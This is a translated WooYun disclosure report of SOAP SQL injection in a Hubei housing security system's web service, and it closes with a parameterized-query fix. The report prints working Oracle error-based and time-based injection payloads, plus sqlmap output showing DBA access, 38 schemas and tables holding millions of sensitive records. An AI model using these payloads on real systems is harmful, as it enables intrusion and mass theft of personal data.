Vulnerability summary (followers: 24)

Defect ID: wooyun-2016-0192182

Title: SOAP injection in a system of a provincial housing security bureau (DBA privileges / 38 databases involved / several million sensitive records exposed)

Related vendor: cncert (National Internet Emergency Center)

Author: 路人甲

Submitted: 2016-04-04 13:40

Fixed: 2016-05-21 14:20

Published: 2016-05-21 14:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-04-04: details sent to the vendor, awaiting vendor handling
2016-04-06: vendor confirmed; details visible to the vendor only
2016-04-16: details disclosed to core white hats and experts in related fields
2016-04-26: details disclosed to regular white hats
2016-05-06: details disclosed to intern white hats
2016-05-21: details disclosed to the public

Brief description:

38 databases, each with hundreds of thousands of rows; together they add up to several million, even tens of millions of records!~~~

Detailed description:

Hubei Province Housing Security Management Information System
Injection point:

**.**.**.**:6080/GISServices/GisServices.asmx (POST)
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/"
xmlns:s="http://**.**.**.**/2001/XMLSchema" xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<tns:GetAreaXMStats xmlns:tns="http://**.**.**.**/">
<tns:areaName>湖北*</tns:areaName>
<tns:xmlbName></tns:xmlbName>
<tns:jsjdName>项目</tns:jsjdName>
<tns:year></tns:year>
</tns:GetAreaXMStats>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


The tns:areaName element is injectable.

sqlmap identified the following injection points with a total of 33 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" xmlns:s="http://**.**.**.**/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<tns:GetAreaXMStats xmlns:tns="http://**.**.**.**/">
<tns:areaName>????%' AND 3310=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(100)||CHR(107)||CHR(117)||CHR(113)||(SELECT (CASE WHEN (3310=3310) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(101)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='</tns:areaName>
<tns:xmlbName></tns:xmlbName>
<tns:jsjdName>???</tns:jsjdName>
<tns:year></tns:year>
</tns:GetAreaXMStats>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" xmlns:s="http://**.**.**.**/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<tns:GetAreaXMStats xmlns:tns="http://**.**.**.**/">
<tns:areaName>????%' AND 3082=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(113)||CHR(86)||CHR(112),5) AND '%'='</tns:areaName>
<tns:xmlbName></tns:xmlbName>
<tns:jsjdName>???</tns:jsjdName>
<tns:year></tns:year>
</tns:GetAreaXMStats>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
---
[18:29:26] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
[18:29:26] [INFO] fetching current user
[18:29:26] [INFO] retrieved: HBZFBZTEST
current user: 'HBZFBZTEST'
[18:29:26] [INFO] fetching current database
[18:29:26] [INFO] resumed: HBZFBZTEST
[18:29:26] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'HBZFBZTEST'
[18:29:26] [INFO] testing if current user is DBA
current user is DBA: True
available databases [38]:
[*] CLGL
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] HBBZF
[*] HBJZGCGLJ
[*] HBJZGCGLJWF
[*] HBKSPJ
[*] HBSBDYKS
[*] HBZFBZ
[*] HBZFBZNEW
[*] HBZFBZTEMP
[*] HBZFBZTEST
[*] HBZFBZTEST1
[*] HBZFBZWEB
[*] HQZXTEST
[*] HYHOUSE
[*] HYHOUSE1
[*] HYHOUSETEST
[*] LJCLC
[*] LJCLCTEST
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SDE
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TESTF
[*] TSMSYS
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB
Database: HBZFBZTEST
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| BTSF | 907119 | subsidy down payments
| DXDCCYXX | 713395 | base-salary survey, common information
| DXDCJBXX | 603055 | base-salary survey, basic information
| JTCYQKB | 550277 | specific employment status table
| SQJTCYXX | 530856 | pre-tax allowance, common information
| ZFXX | 520950 | housing information
| DXDCZFXX | 470300 | base-salary survey, housing information
| JTJBQKB | 457022 |
| SQJTJBXX | 367516 |
| JTDAB | 363887 | allowance archive book
| LHJFB | 295583 |
| SQJTZFXX | 292178 |
| BZDXHTQY | 199284 |
| SQRFWGXB | 137414 |
| SHXX | 116147 |
| MATERIAL_DIR_TABLE | 113781 |
| JTCYXXBF | 102470 |
| NSSHXX | 93787 |
| MATERIAL_DIR_MXB_TABLE | 84565 |
| JTJBXXBF | 67809 |
| YHKZHGL | 59506 |
| JTZFXXBF | 58759 |
| WYFSJGL | 40107 |
| BTYF | 37604 |
| ZFBZDMB | 33676 |
| ZRDJSHAJB | 33375 |
| BTJLB | 28038 |
| NSSHAJB | 25649 |
| DFPSQRGXB | 23948 |
| FWZJSJ | 22329 |
| HTHISTORY | 20446 |
| HBAZXX | 19805 |
| ZLBTTCJL | 16045 |
| FZZJ | 14417 |
| GSXX | 14207 |
| SQRBTJE | 9138 |
| DTGCXX | 8811 |
| WYFSD | 8238 |
| NSGSXX | 7546 |
| BZDXTJYB | 6734 |
| BTSFJL | 6515 |
| XMXX | 4650 |
| YPZFYTTGL | 4466 |
| XMGHXX | 3888 |
| IMGTAB | 3568 |
| TESTJR | 3104 |
| SYS_USER | 3091 |
| HD | 2977 |
| SYS_ROLE_USER | 2643 |
| BZDXXYGL | 2636 |
| HZB | 2509 |
| SYS_ROLE_MENU | 2171 |
| XMJDRZXX | 1915 |
| LHZBXZ | 1776 |
| FILEDB | 1004 |
| LJCLC | 993 |
| XMDETAIL | 987 |
| LJCLCBF | 867 |
| XMXXHISTORY | 733 |
| LZFZLBTBZXZ | 725 |
| ZRDJGZXZ | 647 |
| DXDCZCXX | 618 |
| SQJTZCXX | 580 |
| SYS_MENU_CONTROL | 491 |
| SYS_RESOURCE | 462 |
| TB_SYS_CITY | 384 |
| ZRDJGZZB | 260 |
| XMSTATS | 187 |
| AJGCNDJSJH | 162 |
| SYS_FOLDER | 161 |
| LZFZLBTBZ | 151 |
| LHZBLB | 147 |
| SYS_MENU | 135 |
| XMGHCQAZXX | 127 |
| LZFBTGS | 103 |
| SYS_ROLE_CONTROL | 91 |
| SYS_ROLE | 66 |
| XMNDJHXX | 52 |
| YPSFYTH | 41 |
| BZZJZCYSXX | 40 |
| BZZJZCXX | 34 |
| TB_SYS_CAPITAL | 34 |
| KGJGSTATS | 33 |
| JTZCXXBF | 31 |
| TSCL | 26 |
| TB_SYS_SYSFILES | 23 |
| WYGSXX | 20 |
| AJGCCITY | 17 |
| DSZPOINT | 17 |
| SJTJ | 17 |
| XMJSSPDZDA | 16 |
| BZZJJSXX | 12 |
| BZHSGHZB | 8 |
| NDJHJSXMCB | 8 |
| MATERIAL_MUST_TABLE | 7 |
| TB_SYS_PARAMCENTER | 7 |
| BSCYJB | 6 |
| TB_SYS_SYSMENU | 6 |
| XMCQAZHTBA | 6 |
| ZFBZGHHGZB | 6 |
| ZFJSGH | 6 |
| FZBZ | 5 |
| XMJSSPZYZJXX | 5 |
| TB_SYS_ROLE | 4 |
| ZRDJGZ | 4 |
| BZZJBF | 3 |
| DWSJFXX | 3 |
| TB_SYS_ADMIN | 3 |
| TB_SYS_DISTRIBUTION | 3 |
| XMNDJHCQAZXX | 3 |
| XMXX_PHQCQ | 3 |
| ZFBZNDJHZB | 3 |
| DCZBK | 2 |
| JSXMAJXXB | 2 |
| KHPJFAB | 2 |
| SCYJB | 2 |
| SXX | 2 |
| WWSBXXB | 2 |
| XMCYRYXX | 2 |
| ZFNDJSJH | 2 |
| ZXJC | 2 |
| ZYSJBZZJFPXX | 2 |
| BBDY | 1 |
| BZBZ | 1 |
| BZHTMB | 1 |
| GIS_MUTUALSTATE | 1 |
| KHPJZBB | 1 |
| TB_SYS_USERINFO | 1 |
| XMJSGCSGHTBAXX | 1 |
+------------------------+---------+


Several million records; I will not dig any further into this sensitive information!~~~

[screenshot: 201.jpg]

[screenshot: 202.jpg]

Proof of vulnerability:

As above.

Remediation:

Filter and validate the injected parameter.
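Since the affected endpoint is an ASP.NET .asmx web service in front of Oracle, the fix a practitioner would want to see is a bound-parameter query rather than a string filter. The following C# is an added example and not the audited system's code (which the report does not show): it mirrors the four SOAP parameters of GetAreaXMStats, shows the string-concatenation pattern that lets the reported payload close the LIKE pattern with `%'` and append its own clause, and then the hardened form. The table and column names (XMSTATS, AREANAME, XMLBNAME, JSJDNAME, NF), the connection string and the service account name are assumptions.

```csharp
// Added example, not code from the audited system. Hypothetical ASMX web method
// mirroring the GetAreaXMStats call from the report. Table/column names
// (XMSTATS, AREANAME, XMLBNAME, JSJDNAME, NF) and the connection string are assumptions.
using System;
using System.Data;
using System.Text;
using System.Text.RegularExpressions;
using System.Web.Services;
using Oracle.ManagedDataAccess.Client;

[WebService(Namespace = "http://example.invalid/")]
public class GisServices : WebService
{
    // Placeholder. The report shows the service running as a DBA; a read-only,
    // single-schema account limits what any remaining bug can reach.
    private const string ConnectionString =
        "User Id=GIS_READONLY;Password=<placeholder>;Data Source=ORCL";

    // Before: user input is spliced into the SQL text. The reported payload ends the
    // LIKE pattern with  %'  and appends AND ... , so the rest of the request runs as SQL.
    [WebMethod]
    public DataTable GetAreaXMStats_Vulnerable(string areaName, string xmlbName,
                                               string jsjdName, string year)
    {
        string sql = "SELECT AREANAME, COUNT(*) AS CNT FROM XMSTATS " +
                     "WHERE AREANAME LIKE '" + areaName.Replace("*", "%") + "' " +
                     "AND JSJDNAME = '" + jsjdName + "' GROUP BY AREANAME";
        return Run(new OracleCommand(sql));
    }

    // After: fixed SQL text, every user value bound as a parameter, LIKE metacharacters
    // escaped so the application's own '*' is the only wildcard the caller controls.
    [WebMethod]
    public DataTable GetAreaXMStats(string areaName, string xmlbName,
                                    string jsjdName, string year)
    {
        const string sql =
            "SELECT AREANAME, COUNT(*) AS CNT FROM XMSTATS " +
            "WHERE AREANAME LIKE :areaName ESCAPE '\\' " +
            "AND JSJDNAME = NVL(:jsjdName, JSJDNAME) " +
            "AND XMLBNAME = NVL(:xmlbName, XMLBNAME) " +
            "AND NF = NVL(:nf, NF) " +
            "GROUP BY AREANAME";

        var cmd = new OracleCommand(sql);
        cmd.BindByName = true;
        cmd.Parameters.Add("areaName", OracleDbType.Varchar2).Value = ToLikePattern(areaName);
        cmd.Parameters.Add("jsjdName", OracleDbType.Varchar2).Value = NullIfEmpty(jsjdName);
        cmd.Parameters.Add("xmlbName", OracleDbType.Varchar2).Value = NullIfEmpty(xmlbName);
        cmd.Parameters.Add("nf", OracleDbType.Int32).Value = ParseYear(year);
        return Run(cmd);
    }

    private DataTable Run(OracleCommand cmd)
    {
        using (var conn = new OracleConnection(ConnectionString))
        using (cmd)
        {
            cmd.Connection = conn;
            conn.Open();
            var table = new DataTable("XMStats");
            using (var adapter = new OracleDataAdapter(cmd))
            {
                adapter.Fill(table);
            }
            return table;
        }
    }

    // Empty SOAP elements (as in the report's request) mean "no filter" for that column.
    private static object NullIfEmpty(string s)
    {
        return string.IsNullOrWhiteSpace(s) ? (object)DBNull.Value : s.Trim();
    }

    // Accept only a four-digit year; anything else is rejected before reaching SQL.
    private static object ParseYear(string year)
    {
        if (string.IsNullOrWhiteSpace(year)) return DBNull.Value;
        string y = year.Trim();
        if (!Regex.IsMatch(y, @"^\d{4}$"))
            throw new ArgumentException("year must be a four-digit number");
        return int.Parse(y);
    }

    // Escape Oracle LIKE metacharacters, then map the application's '*' to '%'.
    private static string ToLikePattern(string areaName)
    {
        if (string.IsNullOrWhiteSpace(areaName) || areaName.Length > 50)
            throw new ArgumentException("areaName is required and limited to 50 characters");
        var sb = new StringBuilder();
        foreach (char c in areaName.Trim())
        {
            if (c == '\\' || c == '%' || c == '_') sb.Append('\\');
            sb.Append(c == '*' ? '%' : c);
        }
        return sb.ToString();
    }
}
```

Two points beyond the bind variables: the `ESCAPE '\'` clause matters because a caller could otherwise inject `%` and `_` through a correctly parameterized LIKE to widen the match, and the connection account should not be a DBA, since the report's `current user is DBA: True` is what turned one injectable field into read access over all 38 schemas.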

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-04-06 14:13

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded through CNCERT to the Hubei branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet